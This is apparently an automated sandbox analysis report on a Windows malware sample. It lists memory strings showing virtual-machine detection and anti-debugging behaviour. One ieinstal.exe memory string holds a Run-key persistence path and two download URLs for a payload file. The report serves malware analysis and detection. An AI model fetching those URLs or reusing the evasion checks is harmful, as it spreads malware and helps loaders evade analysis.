      Source: explorer.exe, 00000022.00000003.717933251.0000000004BB9000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Local
      Source: explorer.exe, 00000022.00000003.725008203.0000000004D0A000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Br
      Source: explorer.exe, 00000022.00000003.717933251.0000000004BB9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00I
      Source: explorer.exe, 00000022.00000003.711993399.0000000004C3C000.00000004.00000001.sdmpBinary or memory string: NECVMWarVMware SATA CD001.00
      Source: explorer.exe, 00000022.00000003.722492029.0000000004CA9000.00000004.00000001.sdmpBinary or memory string: NECVMWarer
      Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
      Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
      Source: explorer.exe, 00000022.00000003.724427605.0000000004CA0000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
      Source: explorer.exe, 00000022.00000000.719680431.00000000060E2000.00000004.00000001.sdmpBinary or memory string: k\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: wscript.exe, 00000000.00000003.372188213.00000190E2BBF000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
      Source: ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmpBinary or memory string: user32ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=Software\Microsoft\Windows\CurrentVersion\RunStartup keyhttps://www.wizumiya.co.jp/html/user_data/original/images/bin_WUOAiR166.binhttp://fahrschule-heli.at/bin_WUOAiR166.bin
      Source: explorer.exe, 00000022.00000003.719709332.00000000049A9000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B-4BFC-
      Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
      Source: explorer.exe, 00000022.00000003.717933251.0000000004BB9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000022.00000003.725109525.0000000004CAF000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Beu^
      Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
      Source: explorer.exe, 00000016.00000000.587150869.000000000869A000.00000004.00000001.sdmpBinary or memory string: 700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
      Source: explorer.exe, 00000022.00000003.722492029.0000000004CA9000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B:u
      Source: explorer.exe, 00000016.00000000.534350710.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
      Source: explorer.exe, 00000022.00000003.708741474.0000000004BF0000.00000004.00000001.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}fb
      Source: explorer.exe, 00000016.00000000.534350710.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
      Source: explorer.exe, 00000016.00000000.585239020.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
      Source: explorer.exe, 00000022.00000003.725109525.0000000004CAF000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bhja

      Anti Debugging:

      barindex
      Hides threads from debuggersShow sources
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED46DE6 rdtsc 18_2_1ED46DE6
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\cmstp.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD8ED6 mov eax, dword ptr fs:[00000030h]18_2_1EDD8ED6
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED48EC7 mov eax, dword ptr fs:[00000030h]18_2_1ED48EC7
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDBFEC0 mov eax, dword ptr fs:[00000030h]18_2_1EDBFEC0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED336CC mov eax, dword ptr fs:[00000030h]18_2_1ED336CC
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED316E0 mov ecx, dword ptr fs:[00000030h]18_2_1ED316E0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED176E2 mov eax, dword ptr fs:[00000030h]18_2_1ED176E2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED9FE87 mov eax, dword ptr fs:[00000030h]18_2_1ED9FE87
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD0EA5 mov eax, dword ptr fs:[00000030h]18_2_1EDD0EA5
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD0EA5 mov eax, dword ptr fs:[00000030h]18_2_1EDD0EA5
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD0EA5 mov eax, dword ptr fs:[00000030h]18_2_1EDD0EA5
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED846A7 mov eax, dword ptr fs:[00000030h]18_2_1ED846A7
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED17E41 mov eax, dword ptr fs:[00000030h]18_2_1ED17E41
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED17E41 mov eax, dword ptr fs:[00000030h]18_2_1ED17E41
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED17E41 mov eax, dword ptr fs:[00000030h]18_2_1ED17E41
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED17E41 mov eax, dword ptr fs:[00000030h]18_2_1ED17E41
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED17E41 mov eax, dword ptr fs:[00000030h]18_2_1ED17E41
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED17E41 mov eax, dword ptr fs:[00000030h]18_2_1ED17E41
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDCAE44 mov eax, dword ptr fs:[00000030h]18_2_1EDCAE44
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDCAE44 mov eax, dword ptr fs:[00000030h]18_2_1EDCAE44
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED2AE73 mov eax, dword ptr fs:[00000030h]18_2_1ED2AE73
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED2AE73 mov eax, dword ptr fs:[00000030h]18_2_1ED2AE73
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED2AE73 mov eax, dword ptr fs:[00000030h]18_2_1ED2AE73
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED2AE73 mov eax, dword ptr fs:[00000030h]18_2_1ED2AE73
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED2AE73 mov eax, dword ptr fs:[00000030h]18_2_1ED2AE73
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED1766D mov eax, dword ptr fs:[00000030h]18_2_1ED1766D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED3A61C mov eax, dword ptr fs:[00000030h]18_2_1ED3A61C
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED3A61C mov eax, dword ptr fs:[00000030h]18_2_1ED3A61C
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED0C600 mov eax, dword ptr fs:[00000030h]18_2_1ED0C600
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED0C600 mov eax, dword ptr fs:[00000030h]18_2_1ED0C600
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED0C600 mov eax, dword ptr fs:[00000030h]18_2_1ED0C600
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED38E00 mov eax, dword ptr fs:[00000030h]18_2_1ED38E00
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDC1608 mov eax, dword ptr fs:[00000030h]18_2_1EDC1608
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDBFE3F mov eax, dword ptr fs:[00000030h]18_2_1EDBFE3F
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED0E620 mov eax, dword ptr fs:[00000030h]18_2_1ED0E620
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED437F5 mov eax, dword ptr fs:[00000030h]18_2_1ED437F5
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED18794 mov eax, dword ptr fs:[00000030h]18_2_1ED18794
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED87794 mov eax, dword ptr fs:[00000030h]18_2_1ED87794
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED87794 mov eax, dword ptr fs:[00000030h]18_2_1ED87794
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED87794 mov eax, dword ptr fs:[00000030h]18_2_1ED87794
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED1EF40 mov eax, dword ptr fs:[00000030h]18_2_1ED1EF40
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED1FF60 mov eax, dword ptr fs:[00000030h]18_2_1ED1FF60
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD8F6A mov eax, dword ptr fs:[00000030h]18_2_1EDD8F6A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED2F716 mov eax, dword ptr fs:[00000030h]18_2_1ED2F716
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED9FF10 mov eax, dword ptr fs:[00000030h]18_2_1ED9FF10
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED9FF10 mov eax, dword ptr fs:[00000030h]18_2_1ED9FF10
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD070D mov eax, dword ptr fs:[00000030h]18_2_1EDD070D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD070D mov eax, dword ptr fs:[00000030h]18_2_1EDD070D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED3A70E mov eax, dword ptr fs:[00000030h]18_2_1ED3A70E
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED3A70E mov eax, dword ptr fs:[00000030h]18_2_1ED3A70E
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED3E730 mov eax, dword ptr fs:[00000030h]18_2_1ED3E730
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED04F2E mov eax, dword ptr fs:[00000030h]18_2_1ED04F2E
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED04F2E mov eax, dword ptr fs:[00000030h]18_2_1ED04F2E
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD8CD6 mov eax, dword ptr fs:[00000030h]18_2_1EDD8CD6
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDC14FB mov eax, dword ptr fs:[00000030h]18_2_1EDC14FB
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED86CF0 mov eax, dword ptr fs:[00000030h]18_2_1ED86CF0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED86CF0 mov eax, dword ptr fs:[00000030h]18_2_1ED86CF0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED86CF0 mov eax, dword ptr fs:[00000030h]18_2_1ED86CF0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED1849B mov eax, dword ptr fs:[00000030h]18_2_1ED1849B
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED9C450 mov eax, dword ptr fs:[00000030h]18_2_1ED9C450
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED9C450 mov eax, dword ptr fs:[00000030h]18_2_1ED9C450
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED3A44B mov eax, dword ptr fs:[00000030h]18_2_1ED3A44B
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED2746D mov eax, dword ptr fs:[00000030h]18_2_1ED2746D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD740D mov eax, dword ptr fs:[00000030h]18_2_1EDD740D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD740D mov eax, dword ptr fs:[00000030h]18_2_1EDD740D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDD740D mov eax, dword ptr fs:[00000030h]18_2_1EDD740D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED86C0A mov eax, dword ptr fs:[00000030h]18_2_1ED86C0A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED86C0A mov eax, dword ptr fs:[00000030h]18_2_1ED86C0A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED86C0A mov eax, dword ptr fs:[00000030h]18_2_1ED86C0A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED86C0A mov eax, dword ptr fs:[00000030h]18_2_1ED86C0A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDC1C06 mov eax, dword ptr fs:[00000030h]18_2_1EDC1C06
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDC1C06 mov eax, dword ptr fs:[00000030h]18_2_1EDC1C06
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDC1C06 mov eax, dword ptr fs:[00000030h]18_2_1EDC1C06
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDC1C06 mov eax, dword ptr fs:[00000030h]18_2_1EDC1C06
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDC1C06 mov eax, dword ptr fs:[00000030h]18_2_1EDC1C06
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDC1C06 mov eax, dword ptr fs:[00000030h]18_2_1EDC1C06
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDC1C06 mov eax, dword ptr fs:[00000030h]18_2_1EDC1C06
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDC1C06 mov eax, dword ptr fs:[00000030h]18_2_1EDC1C06
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDC1C06 mov eax, dword ptr fs:[00000030h]18_2_1EDC1C06
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDC1C06 mov eax, dword ptr fs:[00000030h]18_2_1EDC1C06
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDC1C06 mov eax, dword ptr fs:[00000030h]18_2_1EDC1C06
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDC1C06 mov eax, dword ptr fs:[00000030h]18_2_1EDC1C06
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDC1C06 mov eax, dword ptr fs:[00000030h]18_2_1EDC1C06
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDC1C06 mov eax, dword ptr fs:[00000030h]18_2_1EDC1C06
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED3BC2C mov eax, dword ptr fs:[00000030h]18_2_1ED3BC2C
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED86DC9 mov eax, dword ptr fs:[00000030h]18_2_1ED86DC9
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED86DC9 mov eax, dword ptr fs:[00000030h]18_2_1ED86DC9
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED86DC9 mov eax, dword ptr fs:[00000030h]18_2_1ED86DC9
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED86DC9 mov ecx, dword ptr fs:[00000030h]18_2_1ED86DC9
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED86DC9 mov eax, dword ptr fs:[00000030h]18_2_1ED86DC9
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED86DC9 mov eax, dword ptr fs:[00000030h]18_2_1ED86DC9
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDB8DF1 mov eax, dword ptr fs:[00000030h]18_2_1EDB8DF1
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED1D5E0 mov eax, dword ptr fs:[00000030h]18_2_1ED1D5E0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED1D5E0 mov eax, dword ptr fs:[00000030h]18_2_1ED1D5E0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDCFDE2 mov eax, dword ptr fs:[00000030h]18_2_1EDCFDE2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDCFDE2 mov eax, dword ptr fs:[00000030h]18_2_1EDCFDE2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDCFDE2 mov eax, dword ptr fs:[00000030h]18_2_1EDCFDE2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1EDCFDE2 mov eax, dword ptr fs:[00000030h]18_2_1EDCFDE2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED3FD9B mov eax, dword ptr fs:[00000030h]18_2_1ED3FD9B
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED3FD9B mov eax, dword ptr fs:[00000030h]18_2_1ED3FD9B
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED32581 mov eax, dword ptr fs:[00000030h]18_2_1ED32581
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED32581 mov eax, dword ptr fs:[00000030h]18_2_1ED32581
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED32581 mov eax, dword ptr fs:[00000030h]18_2_1ED32581
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED32581 mov eax, dword ptr fs:[00000030h]18_2_1ED32581
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED02D8A mov eax, dword ptr fs:[00000030h]18_2_1ED02D8A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED02D8A mov eax, dword ptr fs:[00000030h]18_2_1ED02D8A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED02D8A mov eax, dword ptr fs:[00000030h]18_2_1ED02D8A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED02D8A mov eax, dword ptr fs:[00000030h]18_2_1ED02D8A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED02D8A mov eax, dword ptr fs:[00000030h]18_2_1ED02D8A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED31DB5 mov eax, dword ptr fs:[00000030h]18_2_1ED31DB5
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED31DB5 mov eax, dword ptr fs:[00000030h]18_2_1ED31DB5
